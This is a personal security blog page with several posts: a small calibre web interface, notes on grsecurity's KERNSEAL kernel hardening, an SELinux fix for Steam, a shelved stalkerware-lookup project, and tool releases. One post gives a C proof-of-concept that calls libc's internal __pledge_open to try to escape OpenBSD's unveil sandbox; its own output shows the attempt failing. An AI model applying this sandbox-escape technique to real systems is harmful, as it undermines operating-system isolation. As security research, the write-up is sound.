Artificial truth

swic: a simple web interface for calibre

2026-04-21T02:00:00+02:00

I'm ~regularly doing lightweight security audits of the services I'm running exposed on the internet. One of them is calibre-web. After 2h and 17 security-related pull-requests later, I gave up and decided to write a replacement: swic. It only has 3 user-facing features: showing the ebooks as a list, a searchsbar, and allowing the user to download the ebooks. I don't need anything else. UI-wise, it looks like this:

It's written in go, meaning that it's both trivial to deploy and to audit. It has a single direct dependency (modernc.org/sqlite) to read calibre's database. It doesn't handle users, doesn't need to have write-access to anything, doesn't process untrusted data besides user-provided urls, makes use of Go's os.root to prevent path traversals. The interface is fully responsive and doesn't use any javascript.

The code isn't the prettiest, but the whole thing was written in an evening. You should replace calibre-web with it before somebody drops an RCE :p

A quick look at __pledge_open(2)

2026-04-02T14:30:00+02:00

A recent article of the OpenBSD journal caught me attention: Pledge changes in 7.9-beta (archive.org mirror as it's currently offline).

The quoted message starts with:

Previously under certain promises it was possible to open certain files or devices even if the program didn't pledge "rpath" or "wpath". This behavior has gone away in 7.9-beta; libc uses the special __pledge_open(2) syscall which cannot be used outside of libc.

So a new syscall, bypassing pledge/unveil, interesting. The "cannot be used outside of libc" is likely referring to pinsyscall, which is an indirect call away. Let's check if this is indeed a sandbox escape. The function setservent_r has a call to __pledge_open, so let's jump directly on the call to please pinsyscall:

#include <unistd.h>
#include <stdlib.h>
#include <stdio.h>
#include <signal.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/ptrace.h>
#include <string.h>

#define F "/tmp/pwned.txt"

typedef int unrestricted_open(const char *, int, ...);

static void on_sigtrap(int sig, siginfo_t *si, void *ctx) {
    // Catch the int3 of setprotoent's epilogue function
    (void)sig; (void)si; (void)ctx;
    write(STDERR_FILENO, "caught SIGTRAP\n", 15);
    char out[20];
    int fd = 4;
    printf("Trying to read fd: %d\n", fd);
    if (read(fd, out, sizeof(out)) < 0 ){
        puts("can't read");
    } else {
        puts(out);
    }

    exit(0);
}

int main(int argc, char** argv) {
    unveil("/home/", "r");
    unveil(NULL, NULL);

    struct sigaction sa;
    memset(&sa, 0, sizeof(sa));
    sa.sa_sigaction = on_sigtrap;
    sa.sa_flags = SA_SIGINFO;
    sigemptyset(&sa.sa_mask);

    if (sigaction(SIGTRAP, &sa, NULL) == -1) {
        perror("sigaction");
        return 1;
    }

    int fd = open(F, O_RDONLY);
    printf("Got fd for open: %d\n", fd);

    open(F, O_RDONLY);
    // offsets for -current valid at 2026-04-02
    size_t daemon_addr = &daemon;
    // get the address of the call to __pledge_open in setprotoent
    size_t unrestricted_open_addr = daemon_addr - (0x00076980 - 0x000E0A07);
    unrestricted_open* unrestricted_open_fcn = (unrestricted_open*)unrestricted_open_addr;
    unrestricted_open_fcn(F, O_RDONLY);

    return 0;
}

Unfortunately:

openbsd$ clang ./test.c  && ./a.out
1 warning generated.
Got fd for open: -1
caught SIGTRAP
Trying to read fd: 4
can't read
openbsd$

This is because there is a check in the form of pledge_namei, with hardcoded paths:

/*
 * Need to make it more obvious that one cannot get through here
 * without the right flags set
 */
int
pledge_namei(struct proc *p, struct nameidata *ni, char *path)
{
    // […]

    /*
     * In specific promise situations, __pledge_open() can open
     * specific paths and ignores rpath, wpath, or unveil restrictions.
     */
    if (ni->ni_unveil & UNVEIL_PLEDGEOPEN) {
#ifdef SMALL_KERNEL
        /* To save ramdisk space, we trust the libc provided paths */
        ni->ni_cnd.cn_flags |= BYPASSUNVEIL;
#else
        int item;

        item = checkpledgepaths(path);
        if (item == 0 &&
            strncmp(path, "/usr/share/zoneinfo/",
            sizeof("/usr/share/zoneinfo/") - 1) == 0) {
            const char *cp;

            item = PLEDGEPATH_ZONEINFO;
            for (cp = path + sizeof("/usr/share/zoneinfo/") - 2;
                *cp; cp++) {
                if (cp[0] == '/' &&
                    cp[1] == '.' && cp[2] == '.' &&
                    (cp[3] == '/' || cp[3] == '\0')) {
                    item = 0;   /* bad path */
                    break;
                }
            }
        }

        switch (item) {
        case 0:
            /* Invalid path provided to __pledge_open */
            return (pledge_fail(p, EACCES, (nip & ~ple)));

        /* "stdio" - for daemon(3) or other such functions */
        case PLEDGEPATH_NULL:
            if ((nip & ~(PLEDGE_RPATH | PLEDGE_WPATH)) == 0)
                ni->ni_cnd.cn_flags |= BYPASSUNVEIL;
            break;

        /* "tty" - readpassphrase(3), getpass(3) */
        case PLEDGEPATH_TTY:
            if ((ple & PLEDGE_TTY) &&
                (nip & ~(PLEDGE_RPATH | PLEDGE_WPATH)) == 0)
                ni->ni_cnd.cn_flags |= BYPASSUNVEIL;
            break;

        /* "getpw" requirements */
        case PLEDGEPATH_SPWD:
            /* XXX should remove nip check! */
            if ((ple & PLEDGE_GETPW) && (nip == PLEDGE_RPATH))
                return (EPERM);
            break;
        case PLEDGEPATH_PWD:
            /* FALLTHROUGH */
        case PLEDGEPATH_GROUP:
            /* FALLTHROUGH */
        case PLEDGEPATH_NETID:
            if ((ple & PLEDGE_GETPW) && (nip == PLEDGE_RPATH))
                ni->ni_cnd.cn_flags |= BYPASSUNVEIL;
            break;

        /* "dns" requirements */
        case PLEDGEPATH_RESOLVCONF:
            /* FALLTHROUGH */
        case PLEDGEPATH_HOSTS:
            /* FALLTHROUGH */
        case PLEDGEPATH_SERVICES:
            /* FALLTHROUGH */
        case PLEDGEPATH_PROTOCOLS:
            if ((ple & PLEDGE_DNS) && (nip == PLEDGE_RPATH))
                ni->ni_cnd.cn_flags |= BYPASSUNVEIL;
            break;

        /* tzset() often happen late in programs */
        case PLEDGEPATH_LOCALTIME:
            /* FALLTHROUGH */
        case PLEDGEPATH_ZONEINFO:
            if (nip == PLEDGE_RPATH)
                ni->ni_cnd.cn_flags |= BYPASSUNVEIL;
            break;

        default:
            panic("pledgepaths table is broken");
        }
#endif /* SMALL_KERNEL */
    }
// […]

Maybe it's worth reading emails in their entirety after all, instead of only the first paragraph, as it ended with:

The list of promises and the special paths which could previously be opened under that promise is:

stdio /dev/null (rpath or wpath) /etc/localtime /usr/share/zoneinfo

tty /dev/tty (rpath or wpath)

dns /etc/resolv.conf /etc/hosts /etc/services /etc/protocols

getpw /etc/group /etc/netid /etc/pwd.db (the .db files really should be left to the system) /etc/spwd.db (could not open, but returned EPERM)

As a small consolation, it might still be a valid bypass on OpenBSD with a compiled with SMALL_KERNEL, but OpenBSD being what it is, -current doesn't compile with the SMALL_KERNEL option, and I can't be arsed to fix it:

openbsd# make
cc -g -Werror -Wall -Wimplicit-function-declaration  -Wno-pointer-sign  -Wframe-larger-than=2047 -Wno-address-of-packed-member -Wno-constant-conversion  -Wno-unused-but-set-variable -Wno-gnu-folding-constant -mcmodel=kernel -mno-red-zone -mno-sse2 -mno-sse -mno-3dnow  -mno-mmx -msoft-float -fno-omit-frame-pointer -ffreestanding -fno-pie -msave-args -mno-retpoline -fcf-protection=none -Oz  -pipe -nostdinc -I/sys -I/usr/src/sys/arch/amd64/compile/GENERIC/obj -I/sys/arch  -I/sys/dev/pci/drm/include  -I/sys/dev/pci/drm/include/uapi  -I/sys/dev/pci/drm/amd/include/asic_reg  -I/sys/dev/pci/drm/amd/include  -I/sys/dev/pci/drm/amd/amdgpu  -I/sys/dev/pci/drm/amd/display  -I/sys/dev/pci/drm/amd/display/include  -I/sys/dev/pci/drm/amd/display/dc  -I/sys/dev/pci/drm/amd/display/amdgpu_dm  -I/sys/dev/pci/drm/amd/pm/inc  -I/sys/dev/pci/drm/amd/pm/legacy-dpm  -I/sys/dev/pci/drm/amd/pm/swsmu  -I/sys/dev/pci/drm/amd/pm/swsmu/inc  -I/sys/dev/pci/drm/amd/pm/swsmu/smu11  -I/sys/dev/pci/drm/amd/pm/swsmu/smu12  -I/sys/dev/pci/drm/amd/pm/swsmu/smu13  -I/sys/dev/pci/drm/amd/pm/swsmu/smu14  -I/sys/dev/pci/drm/amd/pm/powerplay/inc  -I/sys/dev/pci/drm/amd/pm/powerplay/hwmgr  -I/sys/dev/pci/drm/amd/pm/powerplay/smumgr  -I/sys/dev/pci/drm/amd/pm/swsmu/inc  -I/sys/dev/pci/drm/amd/pm/swsmu/inc/pmfw_if  -I/sys/dev/pci/drm/amd/display/dc/inc  -I/sys/dev/pci/drm/amd/display/dc/inc/hw  -I/sys/dev/pci/drm/amd/display/dc/clk_mgr  -I/sys/dev/pci/drm/amd/display/dc/dccg  -I/sys/dev/pci/drm/amd/display/dc/dio  -I/sys/dev/pci/drm/amd/display/dc/dpp  -I/sys/dev/pci/drm/amd/display/dc/dsc  -I/sys/dev/pci/drm/amd/display/dc/dwb  -I/sys/dev/pci/drm/amd/display/dc/hubbub  -I/sys/dev/pci/drm/amd/display/dc/hpo  -I/sys/dev/pci/drm/amd/display/dc/hwss  -I/sys/dev/pci/drm/amd/display/dc/hubp  -I/sys/dev/pci/drm/amd/display/dc/dml2  -I/sys/dev/pci/drm/amd/display/dc/dml2/dml21  -I/sys/dev/pci/drm/amd/display/dc/dml2/dml21/inc  -I/sys/dev/pci/drm/amd/display/dc/dml2/dml21/src/dml2_core  -I/sys/dev/pci/drm/amd/display/dc/dml2/dml21/src/dml2_dpmm  -I/sys/dev/pci/drm/amd/display/dc/dml2/dml21/src/dml2_mcg  -I/sys/dev/pci/drm/amd/display/dc/dml2/dml21/src/dml2_pmo  -I/sys/dev/pci/drm/amd/display/dc/dml2/dml21/src/dml2_standalone_libraries  -I/sys/dev/pci/drm/amd/display/dc/dml2/dml21/src/inc  -I/sys/dev/pci/drm/amd/display/dc/mmhubbub  -I/sys/dev/pci/drm/amd/display/dc/mpc  -I/sys/dev/pci/drm/amd/display/dc/opp  -I/sys/dev/pci/drm/amd/display/dc/optc  -I/sys/dev/pci/drm/amd/display/dc/pg  -I/sys/dev/pci/drm/amd/display/dc/resource  -I/sys/dev/pci/drm/amd/display/modules/inc  -I/sys/dev/pci/drm/amd/display/modules/hdcp  -I/sys/dev/pci/drm/amd/display/dmub/inc  -I/sys/dev/pci/drm/i915 -DDDB -DDIAGNOSTIC -DKTRACE -DACCOUNTING -DKMEMSTATS -DPTRACE -DPOOL_DEBUG -DCRYPTO -DSYSVMSG -DSYSVSEM -DSYSVSHM -DUVM_SWAP_ENCRYPT -DFFS -DFFS2 -DUFS_DIRHASH -DQUOTA -DEXT2FS -DMFS -DNFSCLIENT -DNFSSERVER -DCD9660 -DUDF -DMSDOSFS -DFIFO -DFUSE -DSOCKET_SPLICE -DTCP_ECN -DTCP_SIGNATURE -DINET6 -DIPSEC -DPPP_BSDCOMP -DPPP_DEFLATE -DPIPEX -DMROUTING -DMPLS -DBOOT_CONFIG -DUSER_PCICONF -DAPERTURE -DMTRR -DNTFS -DSUSPEND -DHIBERNATE -DSMALL_KERNEL -DPCIVERBOSE -DUSBVERBOSE -DWSDISPLAY_COMPAT_USL -DWSDISPLAY_COMPAT_RAWKBD -DWSDISPLAY_DEFAULTSCREENS="6" -DX86EMU -DI915 -DONEWIREVERBOSE -DMAXUSERS=80 -D_KERNEL -MD -MP  -c /sys/dev/acpi/acpibtn.c
/sys/dev/acpi/acpibtn.c:292:12: error: use of undeclared identifier 'pwr_action'
  292 |                         switch (pwr_action) {
      |                                 ^
1 error generated.
*** Error 1 in /usr/src/sys/arch/amd64/compile/GENERIC (Makefile:2680 'acpibtn.o')
openbsd#

So who knows.

(Thanks to K3 for looking into this we me.)

Quick notes on KERNSEAL

2026-03-25T15:30:00+01:00

The mysterious unreadable kernseal.txt file on PaX' documentation page has been sitting there since 2003, described as "sealed kernel storage design & implementation." In 2006, it was described as:

the problem KERNSEAL sets out to solve is kernel self-protection, that is, assuming arbitrary read/write access to kernel memory (by some bug, but for all i care, it could even be a mode 777 /dev/mem as well), the goal is to prevent privilege elevation (vs. privilege abuse which is an even harder problem to solve).

After many years of KERNSEAL ETA WEN jokes on #grsecurity, it was finally made available to grsecurity beta customers in August 2023 and to LTS ones in January 2024. I was eagerly expecting minipli's blogpost on the topic, but since none got published so far, I endeavoured to read an old patch a friend of mine was kind enough to sling my way, and take/publish some high-level notes while waiting for it, as apparently the diff for pax-linux-6.2.13-test6-kernseal-only.patch is "only" 66 files changed, 1118 insertions(+), 361 deletions(-). Odds are that most of my understanding is completely wrong nonetheless, so take everything written here with a mountain of salt. Also, I took an old patch and left some bits out out of courtesy, as grsecurity isn't freely available anymore.

The main idea behind PAX_KERNSEAL seems to be the constification of dynamically allocated objects, a bit like PAX_CONSTIFY_PLUGIN is doing for static ones, as well as completely hiding some of them as well. It depends on a couple of things to enforce its security invariants:

PaX' RAP, to prevent existing code out-of-(intended)-order execution, otherwise an attacker could simply ROP their way around KERNSEAL.
PAX_PRIVATE_KSTACKS, to defend against kthreads manipulating each other return addresses after RAP checks.
CONFIG_PAX_PER_CPU_PGD, to prevent other kthreads from accessing temporarily unsealed pages on a given CPU.
CONFIG_PAGE_TABLE_ISOLATION, of course.
Not having hibernation nor kexec support.

It introduces two new page states via GFP flags, and stores those properties in the struct page:

__GFP_SEALED/PG_sealed: The page is mapped read-only in the direct map (the linear mapping of all physical memory.)
__GFP_HIDDEN/PG_hidden: The page is mapped invalid (completely unmapped) in the direct map, so contents can't be read or written through the normal direct-map address.

New corresponding migrate types (MIGRATE_SEALED and MIGRATE_HIDDEN) are added to the buddy allocator, ensuring that sealed and hidden pages are grouped together in dedicated pageblocks. Of course those types are non-mergeable, preventing the allocator from stealing sealed/hidden blocks for normal allocations.

When a pageblock is set up for sealed or hidden use, pax_setup_pageblock() walks the PMD entries in the direct map and applies pmd_wrprotect() (for sealed) or pmd_mkinvalid() (for hidden), followed by a TLB flush. After allocation, post_alloc_hook() verifies that page flags match the requested GFP flags (sealed pages must have PG_sealed, etc.), and updates per-node statistics (NR_SEALED, NR_HIDDEN).

As hidden pages have no valid direct-map mapping, the kernel needs a way to temporarily access them, which is done via pax_expose_page/pax_hide_page pair, a bit like KERNEXEC's pax_open_kernel/pax_close_kernel are doing to keep the kernel code read-only.

A dedicated KM_USER_SLOT is reserved for KERNSEAL kmap operations, and every kmap-related call is hooked: if the page is hidden, it goes through pax_expose_page() to create a temporary per-CPU mapping; if sealed, access is blocked entirely with VM_BUG_ON_PAGE_ALWAYS, dumping the page and calling BUG().

A new kmalloc cache type (KMALLOC_SEALED) is added, to allow the kernel to allocated sealed data on a lower granularity than page-level. Temporarily unseal capability (for initialization for example) is provided by pax_open_seal()/pax_close_seal(), which are simply wrappers around pax_open_kernel and pax_close_kernel.

The most obvious usage of KERNSEAL on the patch I have is on struct cred: The mutable fields (usage, rcu, non_rcu) are split into a separate struct cred_rw, while the cred structure itself is marked __mutable_const, with the rw portion being actually a pointer to separately-allocated mutable memory:

 */
 struct cred {                                                                       
-       atomic_long_t   usage;
+       struct cred_rw {
+               /* RCU deletion */
+               union {
+                       int non_rcu;            /* Can we skip RCU deletion? */
+                       struct rcu_head rcu;    /* RCU deletion hook */
+               };
+#ifdef CONFIG_PAX_KERNSEAL      
+               struct cred     *cred;
+#endif
+               atomic_long_t   usage;   
+       }
+#ifdef CONFIG_PAX_KERNSEAL
+       *rw;
+#else
+       _rw;
+#endif

// [...]

+#ifdef CONFIG_PAX_KERNSEAL
+} __randomize_layout __mutable_const;
+#else
 } __randomize_layout;
+#endif

and used like this:

+#ifdef CONFIG_PAX_KERNSEAL
+#define to_cred_rw(cred)       (cred->rw)
+#define to_cred(cred_rw)       (cred_rw->cred)                          
+#else
+#define to_cred_rw(cred)       (&cred->_rw)
+#define to_cred(cred_rw)       (container_of(cred_rw, struct cred, _rw))
+#endif
+

This means the credential's security-sensitive fields (UIDs, GIDs, capabilities) live on sealed pages and cannot be tampered with, while the reference count and RCU linkage live on normal writable memory.

Debugging-wise, When a page fault occurs on a direct-mapped address, the fault handler checks whether the page is sealed or hidden and provides a clear diagnostic:

+   if (is_direct_mapped_addr((void *)address)) {
+       struct page *page = virt_to_page((void *)address);
+       if (PageSealed(page) || PageHidden(page)) {
+           pr_alert("BUG: unable to handle page fault for %s page at %pS\n",
+               PageSealed(page) ? "sealed" : "hidden", (void *)address);

Moreover, sealed and hidden page counts are exposed via /proc/meminfo and per-node meminfo, plus per-process stats in /proc/<pid>/smaps:

Sealed: — total sealed pages in kB
Hidden: — total hidden pages in kB

New kpageflags bits (KPF_SEALED = 62, KPF_HIDDEN = 63) are also exported.

As for PAX_PRIVATE_KSTACKS (in the context of PAX_KERNSEAL), it creates a per-CPU page table where each task gets a dedicated slot with guard pages. Only the current task's stack is accessible, via dynamic PTE-level (un)mapping magic. Underlying physical pages are allocated with __GFP_HIDDEN of course. For stack variables that require DMA/async access, an ad-hoc GCC plugin identifies them and stores them in a per-task dedicated page.

Even though PAX_PRIVATE_KSTACKS and PAX_KERNSEAL are conceptually simple mitigation, they are likely super-tedious to apply to the Linux kernel code behemoth. Tackling data-only attacks is hard, and the only other people seriously trying to address them is Apple, with their hardware-based KTRR/CTRR/GXF/APRR/PPL/SPTM/TXM mitigations. This makes KERNSEAL all the more remarkable, as like everything produced by the PaX Team, it doesn't require special hardware support.

Another interesting property of KERNSEAL is that it can serve as a basis for other interesting things, like ensuring that no guest pages are available at the hypervisor level in KVM for example. I can't wait to see what will be built on top next.

All in all, unsurprisingly, KERNSEAL is yet another all-around tour de force from the PaX Team, who keeps consistently producing stellar software-only mitigations before everyone else, since almost 25 years.

Fixing Steam's "Download failed: http error 0" on Asahi Linux

2026-03-18T00:45:00+01:00

Thanks to the amazing work of the Asahi Team, Steam is running on my arm64 Linux on my Apple M2. Unfortunately, it seems that a recent update broke the ability for Steam to speak to the internet, with logs looking this like:

[2026-03-17 23:11:20] Set status message: Checking for available updates...
[  0%] Checking for available updates...
[2026-03-17 23:11:20] Set percent complete: -1
[2026-03-17 23:11:20] Manifest download: waiting for download to finish
[2026-03-17 23:11:20] Manifest download: finished
[2026-03-17 23:11:20] Download failed: http error 0 (client-update.fastly.steamstatic.com/steam_client_ubuntu12)
[2026-03-17 23:11:20] Downloading manifest: https://client-update.akamai.steamstatic.com/steam_client_ubuntu12
[2026-03-17 23:11:20] Manifest download: send request
[2026-03-17 23:11:20] Manifest download: waiting for download to finish
[2026-03-17 23:11:20] Manifest download: finished
[2026-03-17 23:11:20] Download failed: http error 0 (client-update.akamai.steamstatic.com/steam_client_ubuntu12)
[2026-03-17 23:11:20] Downloading manifest: https://client-update.steamstatic.com/steam_client_ubuntu12
[2026-03-17 23:11:20] Manifest download: send request
[2026-03-17 23:11:21] Manifest download: waiting for download to finish
[2026-03-17 23:11:21] Manifest download: finished
[2026-03-17 23:11:21] Download failed: http error 0 (client-update.steamstatic.com/steam_client_ubuntu12)
[2026-03-17 23:11:21] DownloadManifest - exhausted list of download hosts
[2026-03-17 23:11:21] failed to load manifest from buffer.
[2026-03-17 23:11:21] Failed to load manifest
[2026-03-17 23:11:21] Error: Download failed: http error 0
[2026-03-17 23:11:21] Saving metrics to disk (/home/jvoisin/.local/share/Steam/package/steam_client_metrics.bin)
[2026-03-17 23:11:21] Verifying installation...
[2026-03-17 23:11:21] Verifying all executable checksums
[2026-03-17 23:11:21] Set percent complete: -1
[2026-03-17 23:11:21] Set status message: Verifying installation...
[----] Verifying installation...

A quick look at journalctl shows that SELinux doesn't like what passt is trying to do:

Mar 17 23:07:26 chernabog audit[2093303]: AVC avc:  denied  { execstack } for  pid=2093303 comm="passt" scontext=unconfined_u:unconfined_r:passt_t:s0-s0:c0.c1023 tcontext=unconfined_u:unconfined_r:passt_t:s0-s0:c0.c1023 tclass=process permissive=0

Passt is a piece of software providing user-mode networking for virtual machines, and apparently got stuck in the 90s because it requires an executable stack, sigh.

The easiest way to fix this is to ~~read the ~250-pages long SELinux notebook~~ use ausearch and to throw its output to audit2allow:

# ausearch -c 'passt' --raw | audit2allow -M local-passt
******************** IMPORTANT ***********************
To make this policy package active, execute:

semodule -i local-passt.pp

# cat local-passt.te

module local-passt 1.0;

require {
    type passt_t;
    class udp_socket getattr;
    class process { execmem execstack };
}

#============= passt_t ==============

#!!!! This avc is allowed in the current policy
allow passt_t self:process execstack;
allow passt_t self:process execmem;

#!!!! This avc is allowed in the current policy
allow passt_t self:udp_socket getattr;
# semodule -i local-passt.pp
libsemanage.semanage_direct_install_info: Overriding local-passt module at lower priority 300 with module at priority 400.
#

And that's it, Steam should now be able to reach the information superhighway again.

"Have I Been Stalked" post-mortem

2026-02-11T00:30:00+01:00

With more and more databases from stalkerware being made freely available, there were some internal conversations at Echap about what could be done with them to help victims. Everyone knows Have I Been Pwned, the website where you can put your email address and check if it appears in popular database leaks. Wouldn't it be nice to do something similar, but for stalkerware?

I built a prototype in Flask, but quickly switched to Django because of its autogenerated administration interface. It also comes with a lot of nice things like a declarative data model, integrated form validation, and so on. For the database, PostgreSQL was suggested, but I picked sqlite instead, as not that much traffic is expected, and except for new leaks incorporation, access will be purely read-only. Also, easy backups. To prevent enumeration/bruteforce and to keep bots in check, hcaptcha is alright, and it'll likely have a better accessibility than something homegrown.

The real questions were more about privacy than about the technical stack. First of all, the decision was made of allowing users to query the database via IMEI, and not phone numbers, since the later is usually public, and we don't want anyone to check their friends devices. Another important piece was data minimization: we already have databases with a ton of data in them, and there is nothing we can do to reduce those, but what we can do is to only put the smallest possible subset of this data on the website, to tell people if their device was infected, when, by what, and possibly by whom.

The IMEI is stored hashed, not for security purposes as the number of possible IMEI is around 10¹⁴ making the whole keyspace absolutely bruteforceable, but so that an administrator doing maintenance/debugging doesn't see them in clear-text. Another nice trick to prevent the website from knowing who is checking what device, is to generate a dozen random IMEI client-side, and send them along with the real IMEI the user is checking, so that it could only be inferred, if someone wanted to look after the fact, that a given IP address checked a given set of IMEI. Of course, the IMEI-checking queries are made via POST, and thus don't show up in the logs.

Speaking of data, the database leaks were either publicly available, or sent to us by third parties. There is no plans to share them with anyone.

While I'm the one who wrote the code, this project is also the brainchild of Esther, who provided technical expertise on " Django and stuff in production", back'n'forth conversations on everything privacy-related, as well as an early Django-based prototype.

The website looks like this:

Now where can you find this marvel of modern engineering? Well you can't (albeit I can provide the code if you really want.) It was eventually decided to not go through with the project for several reasons, including:

It's a legal minefield that Echap, as a miniscule non-profit, isn't equipped at all to navigate.
On haveibeenpwned, the remediation steps are straightforward: change your password, email you national data protection authorities, go on with your life. For stalkerware, not so much; it's a traumatic event to be told that one's phone has been spied on, and removing the stalkerware might tip the attacker and worsen the situation. Moreover, Echap's is only providing technical expertise/support/training/documentation to entities doing actual assistance, not the assistance itself.
While I'm more-or-less confident in my technical skills, hosting such sensitive data on the internet makes is the kind of thing that keeps you up at night.

It was an interesting idea, with exciting privacy challenges, but in the end, I'm glad it was shelved. But rest assured that other things have being worked on ;)

Antide's Law

2026-02-04T21:00:00+01:00

A friend of mine, namely Antide "xarkes" Petit, came up with a pretty good rule of thumb that I think should be elevated into a law, Antide's Law:

If it's unclear what a cyber-security company is doing, what they're doing is pretty clear.

For example, take a look at Offensive Con 2025 and 2024 sponsors. Amongst them, you can find:

Catalyst Security: "Catalyst Security is a growing team of highly experienced vulnerability researchers, working on solving the most challenging problems in support of our customers."
SAFA: "Leveraging human and machine intelligence, SAFA zooms into cyber threat flashpoints, keeping you protected now and into the future." as well as "SAFA’s progressive approach to cybersecurity means we’re not content to see clients tread water; we strive to keep them ahead of cyber threats. Our in-house research, along with the latest technologies, lets you see what’s coming and proactively adapt."
Vigilant Labs: "It's a need to know thing."
Binary Gecko: "Binary Gecko GmbH provides tailor made cybersecurity solutions and services. Our international team is made up of world class, highly technical professionals with a proven track record in the field. We strive to tackle every problem with a holistic and in depth approach."
Secfence: "Secfence has been the pioneer of Information Security in India for almost a decade. We are a research- based organization and we take pride in innovating and pioneering many techniques and methodologies in Information Security. Along with our in-house research teams, we have formed global alliances to bring the latest and the best technology to our clients."

It's not obvious what services those companies are providing, so it's pretty obvious what services they're providing: exploits/capabilities.

Of course, it isn't a universal law. For one, it doesn't apply to megacorporations, as they too tend to have meaningless blurbs on their websites as well. For example, while "Capgemini helps businesses imagine their future and make it real with AI, technology and people." doesn't means much, what they're providing is information technology consulting and outsourcing, like providing skip tracing services for enforcement and removal operations for the ICE. Also, sometimes, it's simply a company being abysmally bad at marketing.

Note that the contrapositive isn't true, a minority of companies are pretty open about what they're doing, like CrowdFense or Epsilon. And finally, some companies like Zerodium are so (in)famous that everyone knows more or less what they're doing.

Snuffleupagus 0.13.0 - Elephas

2026-01-07T12:00:00+01:00

I just published a new release of Snuffleupagus, the hardening module for php7+ and php8+, version 0.13.0, codename "Elephas", named after the genus of elephants. There aren't any new flashing features, only bug fixes, PHP85 support, minor improvements, and a security fix for CVE-2026-22034!

Thanks to Thomas Chauchefoin for finding the vulnerability and producing a comprehensive write-up. While being assigned CVE is never fun, it's also a sign that people are interested in your software enough to spend the time to looks for bugs. Moreover, I guess it was a learning opportunity to be on the other side for once. As usual, the CVSS score (9.2/10) is bullshit by design as there is no way to properly account for the required conditions:

Snuffleupagus' upload_validation to be enabled, which isn't the default configuration.
To be manually configured to use vld.
To have the vld module unavailable.

Nevertheless, as PHP isn't erroring out on missing modules (!), whatever update/change breaking vld might silently result in a catastrophic remote code execution, so please do update. The fix is dead-simple and can easily be backported if that's your kink.

Changelog

Compatibility with PHP8.5
Add the possibility to log to a file
Improve .drop() logging reliability when set_error_handler is used
Improve simulation mode for unserialize() when no HMAC key is provided
Fix a possible arbitrary code execution on misconfigured upload_validation deployments (CVE-2026-22034)

As usual, if you want to help, we have some low hanging fruits ♥

See you in your PHP stack!

fortify-headers 3.0.1

2026-01-05T17:30:00+01:00

There is a new minor release of fortify-headers, namely 3.0.1. Minor releases means no new features, only bug fixes.

The C language doesn't really have the notion of namespaces: all symbols, except those marked as static are exposed. To mitigate the possibility of collisions, it's a good practise to prefix exported symbols with an library-specific identifier, like xml for libxml2 (eg. xmlReadFile), SSL for OpenSSL (eg. SSL_library_init) and so on. Symbols starting with an underscore followed by either an upper-case letter or another underscore are implementation-reserved. I was a bit cocky, and assumed that since fortify-headers is kind of part of the implementation, I could name macros __format, __warning_if, __access, … Unfortunately, this lead to a collision with LLVM's libcxx, as it defines a __format macro in its C++ locale header (/usr/include/c++/v1/locale). This was found by Haelwenn (lanodan) Monnier, when he tried to make use of fortify-headers on Gentoo. The fix is quite straightforward: make use of a fortify-headers specific prefix, resulting in __fortify_format, __fortify_warning_if, __fortify_access.

The release is available on github, and the tag has been pushed on 2f30 as well.

2025 in retrospect

2025-12-31T23:59:00+01:00

In 2025, I did, amongst other things:

Read some books:
- Torture Taxi: On the Trail of the CIA's Rendition Flights
- Outlaws Inc: a lot of storytelling, not much meat, still interesting.
- Boniments: hard to find anything hiding under so much sarcasm.
- The Assassination Complex: drone-powered war crimes made in USA.
- The Catcher in the Rye: anyone who wants to ban this book didn't read it.
- Blank Spots on the Map: The Dark Geography of the Pentagon's Secret World: fascinating.
- How to Argue With a Meat Eater (and win every time: the amount of bullshit the author had to deal with is impressive.
- Art Crime and its Prevention: A Handbook for Collectors and Art Professionals, equally boring and cocky, gave up around the middle of it.
- Breaking Things at Work: The Luddites Are Right About Why You Hate Your Job, trying to shove everything through a Marxist lens, felt tedious.
- A handful of manga:
  - Gantz: didn't age very well.
  - Deadman Wonderland, uninteresting, gave up after 6 tomes.
  - D.Gray-man: great drawings, everything else is tedious, gave up around book 10.
  - Kokō no Hito: great topic, terrible realisation on every level, gave up after 4 tomes.
  - Mashle: Magic and Muscles: something like "Harry Potter, but the dude can't do magic and has muscles instead." Refreshingly funny.
- Some Warhammer 40,000:
  - Planetkill, nice bunch of novellas.
  - Darkness in the Blood: Mephiston-wanking
  - Elemental Council: properly written Tau novel.
  - Angron: Slave of Nuceria, the birth of Angron's tragedy.
  - Khârn: Eater of Worlds, Khârn's post-Heresy comeback.
  - Ordo Sinister: short story about the eponymous Ordo Sinister
  - No Good Men: great Warhammer Crime short stories anthology
  - Steel Tread, a tank commander story wrapping up a planetary war, really nice.
  - Day of Ascension: a novel from the point of view of a Genestealer cult, refreshing.
  - Leviathan: Space Marines against Tyranids trying to save the day on a dying planet.
  - The Oubliette: with a Planetary governor balancing on the edge of heresy, really good.
  - Scions of the Emperor: Horus Heresy's Primarchs short stories anthology, pretty great.
  - Interceptor City: yet another chef d'œuvre by Dan Abnett featuring the Imperial Navy.
  - The Silent King: wrapping up the Dawn of Fire series, nice to read the Imperium lose for once.
  - Blood of the Emperor: anthology of small novellas about the Primarchs, some are great, others less so.
  - Angron: The Red Angel, about the crushing of a World Eater leader's dreams thanks to Angron's return.
  - The King of the Spoil: commoners fomenting a civil war, with nested political and judicial points of view.
  - Oaths of Damnation: bolter porn featuring the Exorcists chapter, with a terrific intro and a terrible ending.
  - Deathworlder: great Astra Militarum novel, with properly written, badass and charismatic female protagonists.
  - Urdesh: The Serpent and the Saint and Urdesh: The Magister and the Martyr, nice to see ocean-themed marines.
  - Daemonhammer: a novel about an unsubtle inquisitor, nice but not groundbreaking, characters felt a tad undeveloped.
  - Execution Hour, great book about the end of a Planet told by a vessel of the evacuation fleet, too bad the end felt rushed.
  - Era of Ruin: an anthology of novellas about what happens after The End and the Death, unfortunately none of them were super-memorable.
  - Hand of Abaddon, always nice to see the setting moving forward, even though the novel was a tad too tedious/scattered all around the place for my taste.
Did a couple of job interviews:
- Synacktiv, for a red team tooling developer position. I passed the (fun) technical challenge, but didn't finish the interview process as I signed elsewhere.
- The Wikimedia Foundation, for a Staff Software Security Engineer position. I got an offer that I declined, as I got a better one by another company 30min after getting this one.
- ███████████, for a Head of Security and IT position, which was remote-but-a-couple-of-days-a-week-in-Paris, managing 1.5 juniors, for around 3 times less than my current salary. The phone call was awkward.
- Zellic, for a security researcher position, but my solidity auditing skills were too weak, and I thus failed the really cool hiring challenge. But they offered me to continue the interview process for a software engineer/sysadmin position instead. I didn't give it a try it, as I already signed elsewhere.
Played some video games:
